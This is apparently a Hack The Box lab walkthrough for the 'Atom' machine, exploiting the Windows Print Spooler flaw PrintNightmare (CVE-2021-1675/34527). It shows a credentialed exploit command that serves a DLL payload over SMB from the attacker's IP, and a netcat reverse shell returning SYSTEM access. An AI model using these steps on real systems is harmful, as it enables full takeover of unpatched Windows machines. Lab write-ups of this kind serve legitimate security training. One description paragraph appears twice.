CVE-2021-1675(PrintNightmare)
a vulnerability has been found in microsoft windows (Operating System) and classified as critical. This vulnerability affects the function RpcAddPrinterDriverEx of the file spoolsv.exe of the component Print Spooler Service. The manipulation of the argument dwFileCopyFlags with an unknown input leads to a access control vulnerability. The CWE definition for the vulnerability is CWE-284. The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. As an impact it is known to affect confidentiality, integrity, and availability.
a vulnerability has been found in microsoft windows (Operating System) and classified as critical. This vulnerability affects the function RpcAddPrinterDriverEx of the file spoolsv.exe of the component Print Spooler Service. The manipulation of the argument dwFileCopyFlags with an unknown input leads to a access control vulnerability. The CWE definition for the vulnerability is CWE-284. The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. As an impact it is known to affect confidentiality, integrity, and availability.
CVE-2021-34527 is the remote variant of CVE-2021-1675, which uses MS-RPRN and MS-PAR via MSRPC to exploit
It works by exploiting a logic flaw in the MS-RPRN protocol’s RpcAddPrinterDriverEx function.
There’s been another method through the MS-PAR protocol’s the RpcAsyncAddPrinterDriver function. This is similar to RpcAddPrinterDriverEx, but, has far less constraints and is not limited to domain controllers or Windows 10 systems with non-default settings.
Overview of CVE-2021-1675/CVE-2021-34527
Testing
PS C:\tmp> Get-Service Spooler
Status Name DisplayName
------ ---- -----------
Running Spooler Print SpoolerThe vulnerability takes advantage of the Windows-native service called Print Spooler that is enabled by default on all Windows machines (servers and endpoints). The target system running a spoolsv process gave away, and it didn’t seem like there was a patch installed for that.
On top of it, I knew that there is the spooler service running from enumerating the MSRPC server way back.
Exploit (PrintNightmare)
there is this tool that has a built-in SMB server to host the DLL payload, which makes it handier
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/atom/CVE-2021-34527]
└─$ python3 CVE-2021-34527.py $IP -u jason -p 'kidvscat_electron_@123' --local-auth -proto MS-RPRN -dll printnightmare.dll --local-ip 10.10.14.23 -share smb
[*] starting PrintNightmare PoC
[+] Self-hosted payload at \\10.10.14.23\smb\printnightmare.dll
[*] Attempting target: 10.10.10.237
[*] Connecting to ncacn_np:10.10.10.237[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.23\smb\printnightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[-] Exploit returned: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
[*] Closing SMB ServerExecuting
┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.237] 63434
Windows PowerShell running as user ATOM$ on ATOM
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32> hostname
ATOM
PS C:\WINDOWS\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::a113:8872:d58a:1862
Temporary IPv6 Address. . . . . . : dead:beef::c8c5:32a:bb32:10b9
Link-local IPv6 Address . . . . . : fe80::a113:8872:d58a:1862%6
IPv4 Address. . . . . . . . . . . : 10.10.10.237
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
10.10.10.2System Level Compromise